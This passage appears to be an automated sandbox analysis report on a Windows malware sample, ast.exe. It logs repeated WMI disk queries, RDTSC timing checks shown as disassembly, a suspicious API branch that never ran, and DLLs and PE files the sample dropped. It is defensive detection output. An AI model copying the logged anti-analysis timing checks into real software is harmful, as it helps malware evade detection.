                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Section loaded: OutputDebugStringW count: 1837
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | RDTSC instruction interceptor: First address: 69B27E second address: 69B284 instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | RDTSC instruction interceptor: First address: 69B284 second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F86D453B8C6h 0x00000006 sub eax, ebx 0x00000008 mov dword ptr [ebp-04h], eax 0x0000000b mov ecx, 0000000Ah 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | RDTSC instruction interceptor: First address: 69B294 second address: 69B29A instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | RDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F86D453B8C6h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F86D453B8D5h 0x0000000d mov dword ptr [ebp-04h], eax 0x00000010 dec ecx 0x00000011 jne 00007F86D453B8B9h 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | RDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F86D453B8C6h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F86D453B8D5h 0x0000000d dec ecx 0x0000000e jne 00007F86D453B8B9h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Window / User API: threadDelayed 1473
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_10-26681
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-2G518.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-VCJTB.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\msvcr120.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-KGLTC.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\aw_sas32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-JCPUK.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libeay32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-88TFK.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libjpeg-turbo-win.dll
